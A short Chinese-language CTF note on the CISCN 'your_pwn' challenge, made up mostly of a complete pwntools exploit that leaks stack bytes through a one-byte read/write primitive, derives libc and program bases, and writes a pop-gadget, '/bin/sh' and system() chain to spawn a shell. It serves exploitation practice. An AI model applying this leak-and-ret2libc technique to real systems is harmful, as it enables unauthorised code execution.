CISCN-PWN(your_pwn)-笔记

简单的任意读任意写的题目,唯一的限制是每次只能读一个byte,保护全开

但是我对栈还是太生疏了，弄了半天没能搞清楚偏移，最后干脆把内存全部输出，看看哪里有我要的东西。这次的 exp 相比以前要好很多，用了 lambda 和函数封装，写起来的确方便不少。希望以后能逐步建立自己的 exp 框架，不用每次都从头写一遍。

from pwn import *
from re import *

#sh = remote('1b190bf34e999d7f752a35fa9ee0d911.kr-lab.com', 57856)
sh = process('./pwn')


def sla(delim, string):
    """Wait for *delim* on the target's output, then send *string* plus a newline."""
    return sh.sendlineafter(delim, string)


def rl():
    """Receive one line from the target process."""
    return sh.recvline()

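def read(num, s):
    """Read the 8 bytes at indices *num* .. *num+7* through the one-byte read prompt.

    For each index the echoed line is parsed into one byte, normalised to two
    lowercase hex digits and appended to *s* (lowest index first). The parsed
    value is then sent back at the "input new value" prompt, presumably so the
    byte keeps its value after the round trip.

    NOTE: written against Python 2 pwntools, where recvline() returns str; under
    Python 3 it returns bytes and the string handling below would need a decode().

    Args:
        num: first index to read (the caller passes negative values too).
        s: accumulator string the hex digits are appended to.

    Returns:
        *s* with sixteen hex digits appended.
    """
    for i in range(8):
        sla('input index\n', str(num + i))
        a = rl()[15:-1]
        # Bytes >= 0x80 are echoed sign-extended as 'ffffffXX'; keep only 'XX'.
        if a.startswith('ffffff'):
            a = a[6:]
        # Bytes below 0x10 are echoed as a single digit; pad to two so that
        # every byte occupies exactly one hex pair in s.
        if len(a) == 1:
            a = '0' + a
        s += a
        # Send the same value back at the write prompt.
        sla('input new value\n', str(int(a, 16)))
    return s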

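def write(num, hexn):
    """Store the integer *hexn* as 8 little-endian bytes at indices *num* .. *num+7*.

    Each round answers the "input index" prompt, discards the echoed line, and
    sends the next byte of *hexn* (least significant first) at the
    "input new value" prompt.

    Args:
        num: first index to write.
        hexn: integer value to store; only its low 64 bits are written.
    """
    for i in range(8):
        sla('input index\n', str(num + i))
        rl()
        # Mask/shift instead of % and /: integer arithmetic keeps full precision
        # for 64-bit values, whereas float division (Python 3 `/`) would round
        # anything above 2**53.
        sla('input new value\n', str(hexn & 0xff))
        hexn >>= 8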

def again():
    """Answer the three prompts of one idle round, replying 'yes' at the (yes/no) question.

    Index 0 is written with value 0 before the question is answered; the effect
    on the target is presumably to start another round of prompts.
    """
    replies = (
        ('input index\n', str(0)),
        ('input new value\n', str(0)),
        ('(yes/no)? \n', 'yes'),
    )
    for delim, reply in replies:
        sla(delim, reply)

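def reverse(s):
    """Reverse a hex string two characters (one byte) at a time.

    Splits *s* into hex-digit pairs starting from the end and joins them in
    reverse order, turning the little-endian byte sequence read from memory
    into big-endian digit order suitable for int(..., 16). If *s* has an odd
    length the leading single character is dropped. Uses integer stepping so
    the function behaves the same on Python 2 and Python 3 (the previous
    `len(s) / 2` is a float under Python 3 and breaks range()).

    >>> reverse('78563412')
    '12345678'

    Args:
        s: string of hex digits.

    Returns:
        The byte pairs of *s* in reverse order.
    """
    pairs = [s[i:i + 2] for i in range(len(s) - 2, -1, -2)]
    return ''.join(pairs)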

# Patterns and offsets below are specific to this challenge's binary and libc
# build; the byte patterns appear to have been picked by hand out of the dump.
# NOTE: `re` is not a name that `from re import *` provides; it resolves here
# only because `from pwn import *` also exports the `re` module.
stdoutRegex = re.compile(r'20[0-9a-f]{10}')  # 6-byte little-endian pointer whose low byte is 0x20 (matches stdout_off's low byte)
mainRegex = re.compile(r'3f[0-9a-f]{10}')  # 6-byte little-endian pointer whose low byte is 0x3f, adjusted to 0x61 below
# libc-relative offsets, applied to libc_base below
system_off = 0x0000000000045390
stdout_off = 0x00000000003c5620
bin_off = 0x000000000018cd57
# program-image-relative offset, applied to the rebased `base` below
pop_off = 0x0000000000000d03
sla('name:','a')
out = 0  # never read afterwards
s = ''
# Leak stage: dump the 40 bytes at indices -40 .. -1 (five 8-byte reads,
# lowest index first) into the hex string s.
for i in range(5):
    s = read(-40-i*8,s)
again()
# Locate the two pointers in the dump; reverse() flips each 6-byte
# little-endian value into big-endian digit order before int() parses it.
stdout_addr = int('0x' + reverse(stdoutRegex.search(s).group(0)),16)
base = int('0x' + reverse(mainRegex.search(s).group(0)),16)
libc_base = stdout_addr - stdout_off
bin_addr = libc_base + bin_off
system_addr = system_off + libc_base
# Move the leaked value (low byte 0x3f) to the address ending in 0x61, which
# the next line treats as image offset 0xd61 when rebasing to pop_off.
base = base + 0x61 - 0x3f
pop_addr = base - 0x0000000000000d61 + pop_off
success('pop_addr->{:#x}'.format(pop_addr))
success('bin_addr->{:#x}'.format(bin_addr))
success('system_addr->{:#x}'.format(system_addr))
# Write stage: three consecutive 8-byte values at indices 344, 352 and 360.
write(344,pop_addr)
write(352,bin_addr)
write(360,system_addr)
# Non-numeric reply at the index prompt; presumably what makes the target
# leave its read/write loop — confirm against the binary.
sla('input index','a')

sh.interactive()
